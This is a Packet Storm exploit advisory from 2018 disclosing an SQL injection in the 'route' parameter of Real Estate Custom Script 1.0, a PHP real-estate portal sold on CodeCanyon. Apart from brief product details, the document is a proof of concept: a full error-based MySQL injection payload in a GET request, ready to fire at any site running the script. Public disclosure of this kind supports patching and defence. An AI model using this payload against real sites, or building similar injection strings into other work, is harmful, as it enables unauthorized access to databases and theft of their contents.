Real Estate Custom Script 1.0 SQL Injection

2018-02-02T00:00:00
ID PACKETSTORM:146228
Type packetstorm
Reporter 8bitsec
Modified 2018-02-02T00:00:00

Description

                                        
                                            `# Exploit Title: Real Estate Custom Script - 'route' SQL Injection  
# Date: 2018-01-31  
# Exploit Author: 8bitsec  
# Vendor Homepage: https://codecanyon.net/  
# Software Link: https://codecanyon.net/item/real-estate-custom-script/21268075  
# Version: 1.0  
# Tested on: [Kali Linux 2.0 | Mac OS 10.13.3]  
# Email: contact@8bitsec.io  
# Contact: https://twitter.com/_8bitsec  
  
Release Date:  
=============  
2018-01-31  
  
Product & Service Introduction:  
===============================  
Real Estate Custom Script is based on Custom PHP framework, Script was born to be ahead in innovation and at the peak of the real estate portal solutions.  
  
Technical Details & Description:  
================================  
  
SQL injection on [route] parameter.  
  
Proof of Concept (PoC):  
=======================  
  
SQLi:  
  
https://localhost/[path]/index.php?route=property/category  
  
Parameter: route (GET)  
Type: error-based  
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
Payload: route=property/category'||(SELECT 'coKq' FROM DUAL WHERE 3062=3062 AND (SELECT 7059 FROM(SELECT COUNT(*),CONCAT(0x716a6a7671,(SELECT (ELT(7059=7059,1))),0x7176717671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'&filter_propertystatus=1&filter_propertycategory=63&filter_city=any&filter_address=any&filter_country_id=223&filter_zone_id=&filter_range=1;10&  
  
==================  
8bitsec - [https://twitter.com/_8bitsec]  
  
  
`